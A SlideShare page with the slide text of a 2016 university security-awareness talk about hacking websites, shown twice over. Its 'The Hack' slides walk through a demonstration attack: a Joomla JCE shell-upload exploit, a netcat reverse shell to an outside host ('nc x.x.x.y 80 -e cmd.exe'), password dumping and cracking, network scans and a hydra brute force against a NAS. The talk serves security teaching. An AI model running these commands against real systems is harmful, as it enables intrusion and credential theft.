SlideShare a Scribd company logo

Securious talk at the SWCSC event on 24th Feb 2016.

Peter Jones
Peter Jones

Pete Woodward's slides information from the event at the University of Exeter on 24th February 2016.

Technology
1 of 30
Download to read offline
www.securious.co.uk Pete Woodward PCI QSA|CISSP|MBCS|CEH A look into Hacking Websites
www.securious.co.uk • What is a Hacker? • Who Hacks? • Why should we care? • An Ethical Hack Agenda
www.securious.co.uk What is a Hacker?
In the computer security context, a hacker is someone who seeks and exploits weaknesses in a computer system or computer network. www.securious.co.uk
www.securious.co.uk White Hat Black Hat Grey Hat Fall into 3 categories Breaks security for non-malicious reasons. ‘Ethical Hacker’ Violates computer security for little reason beyond maliciousness or personal gain. ‘Criminal’ Lies between a black hat and a white hat, may hack systems for the sole purpose of notifying the Administrator that their system has a security defect.
www.securious.co.uk Why should we care?
www.securious.co.uk Why should we care?
www.securious.co.uk Why should we care? • Name • Address • Date of Birth • Email Address • Telephone number • TalkTalk account information • Credit Card details and/or bank account details
www.securious.co.uk Why should we care?
www.securious.co.uk Why should we care?
www.securious.co.uk An Ethical Hack
www.securious.co.uk An Ethical Hack Generally, the method behind most data breaches isn’t glamorous, and most involves basic stuff, like bad passwords, insecure remote access, un-patched systems, default credentials, or a simple breakdown in the human data control chain.
www.securious.co.uk Starts with Footprinting and Reconnaissance • Finding Company’s Public and Restricted Websites • Determining the Operating System • Collect Location Information • People Search: Social Networking Services
www.securious.co.uk We then conduct Scanning • Check for LIVE systems (ICMP Scanning) • Ping Sweeping on a range of IP addresses • Attempt to obtain a response (ICMP Echo-Reply) that will indicate if a system is LIVE • Fping is a useful automated tool and helps speeds up the scanning process
www.securious.co.uk Next is Enumeration • First REAL attack on target network • Involves active connections to a system and directed queries • Attempt to identify network resources and shares • Find Users, Groups, applications and passwords in use
www.securious.co.uk The Hack Identified a target Website – happens to be running Joomla! Copyright Dr Paul Dowland, Secure South West 6 Generated using https://www.shodan.io/
www.securious.co.uk The Hack Target specific vulnerability within Joomla! …and deploy a simple script… Copyright Dr Paul Dowland, Secure South West 6 root@kali:~# perl jce.pl target.domain.org .::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::. |||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) |||| [*] Checking Exploitability ... [*] Trying to upload 0day.gif ... [*] Trying to change extension from .gif to .php ... [+] 0day.php was successfully uploaded [+] Path: target.domain.org/images/stories/0day.php?cmd=id
www.securious.co.uk The Hack We can examine the file system…find blog config and get MySQL credentials… Copyright Dr Paul Dowland, Secure South West 6 /* Database Settings */ var $host = 'localhost'; var $user = 'root'; var $password = 'root'; var $db = 'blog'; var $dbprefix = 'jos _';
www.securious.co.uk The Hack Get the blog admin password…Joomla! Uses a simple hashing mechanism… md5(Password+salt) stored as hash:salt Copyright Dr Paul Dowland, Secure South West 6 fdb3d81d39d925c1332559d2ea53823e: Ckbco8niuZ6ZR9lSnB80I8NtJki325j2 Write a simple script with a password list to crack the hash….
www.securious.co.uk The Hack Launch a Remote Shell…’netcat’ for example Copyright Dr Paul Dowland, Secure South West 6
www.securious.co.uk The Hack Escalate privileges… Copyright Dr Paul Dowland, Secure South West 6 @echo Dumping blog @"C:Program Files (x86)MySQLMySQL Server 5.5binmysqldump.exe" --user=%dbuser% -- password=%dbpass% --databases blog --log- error="C:Backupdumperrors.txt" > "C:Backupblog.%backupdate%.sql" START c:inetpubwwwrootimagesstoriesnc x.x.x.y 80 -e cmd.exe
www.securious.co.uk The Hack Get Windows Passwords… Copyright Dr Paul Dowland, Secure South West 6 >pwdump7 Administrator:500:NO PASSWORD*********************:47443E24FE435EB5210D91EF28 38659D::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: hackme:1004:NO PASSWORD*********************:F1B94635FACC09D9FCC637A113 DC10B1::: hackme2:1005:NO PASSWORD*********************:079F890A968B7F710A373ABB79 EB11EB::: Pwdump v7.1 - raw password extractor Author: Andres Tarasco Acuna
www.securious.co.uk The Hack Crack the Password… (ophcrack) Copyright Dr Paul Dowland, Secure South West 6
www.securious.co.uk The Hack Cracked…in around 15 minutes, using FREE tool..! Copyright Dr Paul Dowland, Secure South West 6 Via: http://ophcrack.sourceforge.net/ 079F890A968B7F710A373ABB79EB11EB Wizard1!
www.securious.co.uk The Hack Scan INTERNAL network… Copyright Dr Paul Dowland, Secure South West 6 >nmap -sn 192.168.1.0/24 Starting Nmap 7.01 ( https://nmap.org ) MAC Address: 00:1E:67:9A:7E:23 (Intel Corporate) Nmap scan report for 192.168.1.50 Host is up (0.00s latency). MAC Address: 00:1D:73:FA:11:D2 (Buffalo.inc) Nmap scan report for 192.168.1.200 Host is up (0.00s latency). MAC Address: 00:24:B2:BA:6C:90 (Netgear) Nmap scan report for 192.168.1.100 Host is up (0.00s latency). MAC Address: 00:24:B2:BA:66:B4 (Netgear) Nmap scan report for 192.168.1.101 Host is up (0.00s latency).
www.securious.co.uk The Hack Scan INTERESTING host… Copyright Dr Paul Dowland, Secure South West 6 >nmap 192.168.1.200 Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 192.168.1.200 Host is up (0.00s latency). Not shown: 1084 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open sunrpc 139/tcp open netbios-ssn 199/tcp open unknown 443/tcp open https 445/tcp open microsoft-ds 548/tcp open afpovertcp
www.securious.co.uk The Hack Enumerate the shares… Copyright Dr Paul Dowland, Secure South West 6 >net view 192.168.1.200 Shared resources at 192.168.1.200 TEST-NAS_SECRET_Storage_01 Share name Type Used as Comment ---------------------------------------- Applications Disk Applications share DiskImages Disk Imaging Share Media Disk Media Share Projects Disk Projects share Scratch Disk Scratch space The command completed successfully.
www.securious.co.uk The Hack Access the Network Storage Device…(Password cracking tool) Copyright Dr Paul Dowland, Secure South West 6 >hydra -l hackme -P top500.txt -s 443 192.168.1.200 https-get /shares/ Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016- 02-07 23:16:06 [DATA] max 16 tasks per 1 server, overall 64 tasks, 500 login tries (l:1/p:500), ~0 tries per task [DATA] attacking service http-get on port 443 with SSL [443][http-get] host: 192.168.1.200 login: Admin password: letmeIN
www.securious.co.uk The Hack Enjoy…. Copyright Dr Paul Dowland, Secure South West 6 >net use z: 192.168.1.200diskimages letmeIN /USER:Admin The command completed successfully. >dir z: Volume in drive Z is DiskImages Volume Serial Number is 3A5C-C2B8 Directory of Z: 10/01/2016 15:00 <DIR> . 11/05/2015 22:01 <DIR> .. 04/11/2014 15:48 <DIR> Test Stuff 22/07/2015 22:02 <DIR> SECRET STUFF 17/10/2014 15:48 <DIR> Old Stuff ...
www.securious.co.uk Any Questions?

Recommended

Malware cryptomining uploadv3
Malware cryptomining uploadv3Malware cryptomining uploadv3
Malware cryptomining uploadv3
Setia Juli Irzal Ismail
 
Aes jul-upload
Aes jul-uploadAes jul-upload
Aes jul-upload
Setia Juli Irzal Ismail
 
Network Security fundamentals
Network Security fundamentalsNetwork Security fundamentals
Network Security fundamentals
Tariq kanher
 
Pa or die
Pa or diePa or die
Pa or die
Setia Juli Irzal Ismail
 
Cryptography 101 for Java developers
Cryptography 101 for Java developersCryptography 101 for Java developers
Cryptography 101 for Java developers
Michel Schudel
 
Dissecting ZeuS malware
Dissecting ZeuS malwareDissecting ZeuS malware
Dissecting ZeuS malware
Cyphort
 
Zeus Dissected
Zeus DissectedZeus Dissected
Zeus Dissected
Cyphort
 
Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016
John Bambenek
 

Recommended

Malware cryptomining uploadv3
Malware cryptomining uploadv3Malware cryptomining uploadv3
Malware cryptomining uploadv3
Setia Juli Irzal Ismail
 
Aes jul-upload
Aes jul-uploadAes jul-upload
Aes jul-upload
Setia Juli Irzal Ismail
 
Network Security fundamentals
Network Security fundamentalsNetwork Security fundamentals
Network Security fundamentals
Tariq kanher
 
Pa or die
Pa or diePa or die
Pa or die
Setia Juli Irzal Ismail
 
Cryptography 101 for Java developers
Cryptography 101 for Java developersCryptography 101 for Java developers
Cryptography 101 for Java developers
Michel Schudel
 
Dissecting ZeuS malware
Dissecting ZeuS malwareDissecting ZeuS malware
Dissecting ZeuS malware
Cyphort
 
Zeus Dissected
Zeus DissectedZeus Dissected
Zeus Dissected
Cyphort
 
Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016Tracking Exploit Kits - Virus Bulletin 2016
Tracking Exploit Kits - Virus Bulletin 2016
John Bambenek
 
Ethical_Hacking_ppt
Ethical_Hacking_pptEthical_Hacking_ppt
Ethical_Hacking_ppt
Narayanan
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
Keith Brooks
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
ShapeBlue
 
Hunt for the red DA
Hunt for the red DAHunt for the red DA
Hunt for the red DA
Neil Lines
 
Information security & ethical hacking
Information security & ethical hackingInformation security & ethical hacking
Information security & ethical hacking
Sahil Rai
 
Hack the hack
Hack the hackHack the hack
Hack the hack
Shakti Ranjan
 
Fundamentals of network hacking
Fundamentals of network hackingFundamentals of network hacking
Fundamentals of network hacking
Pranshu Pareek
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best Practices
Maxime ALAY-EDDINE
 
Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Thinking Outside the Sand[box]
Thinking Outside the Sand[box]
Juniper Networks
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
VijayPatidar71
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
NitashaKumari2
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
ImXaib
 
Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.
Priyanka Aash
 
The Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListThe Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted List
Security Weekly
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
Peter Sabev
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Rob Fuller
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Chris Gates
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
Geoff Pesimo
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
Jason Ross
 
Hacking
HackingHacking
Hacking
Praveen P
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
The Digital Insurer
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
ThousandEyes
 

More Related Content

Similar to Securious talk at the SWCSC event on 24th Feb 2016.

Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.
Priyanka Aash
 
The Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListThe Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted List
Security Weekly
 

Similar to Securious talk at the SWCSC event on 24th Feb 2016. (20)

Ethical_Hacking_ppt
Ethical_Hacking_pptEthical_Hacking_ppt
Ethical_Hacking_ppt
 
Ethical Hacking
Ethical HackingEthical Hacking
Ethical Hacking
 
Securing your Cloud Environment v2
Securing your Cloud Environment v2Securing your Cloud Environment v2
Securing your Cloud Environment v2
 
Hunt for the red DA
Hunt for the red DAHunt for the red DA
Hunt for the red DA
 
Information security & ethical hacking
Information security & ethical hackingInformation security & ethical hacking
Information security & ethical hacking
 
Hack the hack
Hack the hackHack the hack
Hack the hack
 
Fundamentals of network hacking
Fundamentals of network hackingFundamentals of network hacking
Fundamentals of network hacking
 
Introduction to Software Security and Best Practices
Introduction to Software Security and Best PracticesIntroduction to Software Security and Best Practices
Introduction to Software Security and Best Practices
 
Thinking Outside the Sand[box]
Thinking Outside the Sand[box]Thinking Outside the Sand[box]
Thinking Outside the Sand[box]
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
 
14_526_topic10.ppt
14_526_topic10.ppt14_526_topic10.ppt
14_526_topic10.ppt
 
Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.
 
The Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted ListThe Internet of Insecure Things: 10 Most Wanted List
The Internet of Insecure Things: 10 Most Wanted List
 
Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)Secure Software: Action, Comedy or Drama? (2017 edition)
Secure Software: Action, Comedy or Drama? (2017 edition)
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Hacking 1224807880385377-9
Hacking 1224807880385377-9Hacking 1224807880385377-9
Hacking 1224807880385377-9
 
Malware Analysis For The Enterprise
Malware Analysis For The EnterpriseMalware Analysis For The Enterprise
Malware Analysis For The Enterprise
 
Hacking
HackingHacking
Hacking
 

Recently uploaded

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
giselly40
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Drew Madelung
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
Delhi Call girls
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
Delhi Call girls
 

Recently uploaded (20)

Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
GenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdfGenAI Risks & Security Meetup 01052024.pdf
GenAI Risks & Security Meetup 01052024.pdf
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 

Securious talk at the SWCSC event on 24th Feb 2016.

  • 2. www.securious.co.uk • What is a Hacker? • Who Hacks? • Why should we care? • An Ethical Hack Agenda
  • 4. In the computer security context, a hacker is someone who seeks and exploits weaknesses in a computer system or computer network. www.securious.co.uk
  • 5. www.securious.co.uk White Hat Black Hat Grey Hat Fall into 3 categories Breaks security for non-malicious reasons. ‘Ethical Hacker’ Violates computer security for little reason beyond maliciousness or personal gain. ‘Criminal’ Lies between a black hat and a white hat, may hack systems for the sole purpose of notifying the Administrator that their system has a security defect.
  • 8. www.securious.co.uk Why should we care? • Name • Address • Date of Birth • Email Address • Telephone number • TalkTalk account information • Credit Card details and/or bank account details
  • 12. www.securious.co.uk An Ethical Hack Generally, the method behind most data breaches isn’t glamorous, and most involves basic stuff, like bad passwords, insecure remote access, un-patched systems, default credentials, or a simple breakdown in the human data control chain.
  • 13. www.securious.co.uk Starts with Footprinting and Reconnaissance • Finding Company’s Public and Restricted Websites • Determining the Operating System • Collect Location Information • People Search: Social Networking Services
  • 14. www.securious.co.uk We then conduct Scanning • Check for LIVE systems (ICMP Scanning) • Ping Sweeping on a range of IP addresses • Attempt to obtain a response (ICMP Echo-Reply) that will indicate if a system is LIVE • Fping is a useful automated tool and helps speeds up the scanning process
  • 15. www.securious.co.uk Next is Enumeration • First REAL attack on target network • Involves active connections to a system and directed queries • Attempt to identify network resources and shares • Find Users, Groups, applications and passwords in use
  • 16. www.securious.co.uk The Hack Identified a target Website – happens to be running Joomla! Copyright Dr Paul Dowland, Secure South West 6 Generated using https://www.shodan.io/
  • 17. www.securious.co.uk The Hack Target specific vulnerability within Joomla! …and deploy a simple script… Copyright Dr Paul Dowland, Secure South West 6 root@kali:~# perl jce.pl target.domain.org .::. Exploit for JCE Joomla Extension (Auto Shell Uploader) V0.1 .::. |||| Coded by: Mostafa Azizi (admin[@]0-Day[dot]net) |||| [*] Checking Exploitability ... [*] Trying to upload 0day.gif ... [*] Trying to change extension from .gif to .php ... [+] 0day.php was successfully uploaded [+] Path: target.domain.org/images/stories/0day.php?cmd=id
  • 18. www.securious.co.uk The Hack We can examine the file system…find blog config and get MySQL credentials… Copyright Dr Paul Dowland, Secure South West 6 /* Database Settings */ var $host = 'localhost'; var $user = 'root'; var $password = 'root'; var $db = 'blog'; var $dbprefix = 'jos _';
  • 19. www.securious.co.uk The Hack Get the blog admin password…Joomla! Uses a simple hashing mechanism… md5(Password+salt) stored as hash:salt Copyright Dr Paul Dowland, Secure South West 6 fdb3d81d39d925c1332559d2ea53823e: Ckbco8niuZ6ZR9lSnB80I8NtJki325j2 Write a simple script with a password list to crack the hash….
  • 20. www.securious.co.uk The Hack Launch a Remote Shell…’netcat’ for example Copyright Dr Paul Dowland, Secure South West 6
  • 21. www.securious.co.uk The Hack Escalate privileges… Copyright Dr Paul Dowland, Secure South West 6 @echo Dumping blog @"C:Program Files (x86)MySQLMySQL Server 5.5binmysqldump.exe" --user=%dbuser% -- password=%dbpass% --databases blog --log- error="C:Backupdumperrors.txt" > "C:Backupblog.%backupdate%.sql" START c:inetpubwwwrootimagesstoriesnc x.x.x.y 80 -e cmd.exe
  • 22. www.securious.co.uk The Hack Get Windows Passwords… Copyright Dr Paul Dowland, Secure South West 6 >pwdump7 Administrator:500:NO PASSWORD*********************:47443E24FE435EB5210D91EF28 38659D::: Guest:501:NO PASSWORD*********************:NO PASSWORD*********************::: hackme:1004:NO PASSWORD*********************:F1B94635FACC09D9FCC637A113 DC10B1::: hackme2:1005:NO PASSWORD*********************:079F890A968B7F710A373ABB79 EB11EB::: Pwdump v7.1 - raw password extractor Author: Andres Tarasco Acuna
  • 23. www.securious.co.uk The Hack Crack the Password… (ophcrack) Copyright Dr Paul Dowland, Secure South West 6
  • 24. www.securious.co.uk The Hack Cracked…in around 15 minutes, using FREE tool..! Copyright Dr Paul Dowland, Secure South West 6 Via: http://ophcrack.sourceforge.net/ 079F890A968B7F710A373ABB79EB11EB Wizard1!
  • 25. www.securious.co.uk The Hack Scan INTERNAL network… Copyright Dr Paul Dowland, Secure South West 6 >nmap -sn 192.168.1.0/24 Starting Nmap 7.01 ( https://nmap.org ) MAC Address: 00:1E:67:9A:7E:23 (Intel Corporate) Nmap scan report for 192.168.1.50 Host is up (0.00s latency). MAC Address: 00:1D:73:FA:11:D2 (Buffalo.inc) Nmap scan report for 192.168.1.200 Host is up (0.00s latency). MAC Address: 00:24:B2:BA:6C:90 (Netgear) Nmap scan report for 192.168.1.100 Host is up (0.00s latency). MAC Address: 00:24:B2:BA:66:B4 (Netgear) Nmap scan report for 192.168.1.101 Host is up (0.00s latency).
  • 26. www.securious.co.uk The Hack Scan INTERESTING host… Copyright Dr Paul Dowland, Secure South West 6 >nmap 192.168.1.200 Starting Nmap 7.01 ( https://nmap.org ) Nmap scan report for 192.168.1.200 Host is up (0.00s latency). Not shown: 1084 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open sunrpc 139/tcp open netbios-ssn 199/tcp open unknown 443/tcp open https 445/tcp open microsoft-ds 548/tcp open afpovertcp
  • 27. www.securious.co.uk The Hack Enumerate the shares… Copyright Dr Paul Dowland, Secure South West 6 >net view 192.168.1.200 Shared resources at 192.168.1.200 TEST-NAS_SECRET_Storage_01 Share name Type Used as Comment ---------------------------------------- Applications Disk Applications share DiskImages Disk Imaging Share Media Disk Media Share Projects Disk Projects share Scratch Disk Scratch space The command completed successfully.
  • 28. www.securious.co.uk The Hack Access the Network Storage Device…(Password cracking tool) Copyright Dr Paul Dowland, Secure South West 6 >hydra -l hackme -P top500.txt -s 443 192.168.1.200 https-get /shares/ Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Hydra (http://www.thc.org/thc-hydra) starting at 2016- 02-07 23:16:06 [DATA] max 16 tasks per 1 server, overall 64 tasks, 500 login tries (l:1/p:500), ~0 tries per task [DATA] attacking service http-get on port 443 with SSL [443][http-get] host: 192.168.1.200 login: Admin password: letmeIN
  • 29. www.securious.co.uk The Hack Enjoy…. Copyright Dr Paul Dowland, Secure South West 6 >net use z: 192.168.1.200diskimages letmeIN /USER:Admin The command completed successfully. >dir z: Volume in drive Z is DiskImages Volume Serial Number is 3A5C-C2B8 Directory of Z: 10/01/2016 15:00 <DIR> . 11/05/2015 22:01 <DIR> .. 04/11/2014 15:48 <DIR> Test Stuff 22/07/2015 22:02 <DIR> SECRET STUFF 17/10/2014 15:48 <DIR> Old Stuff ...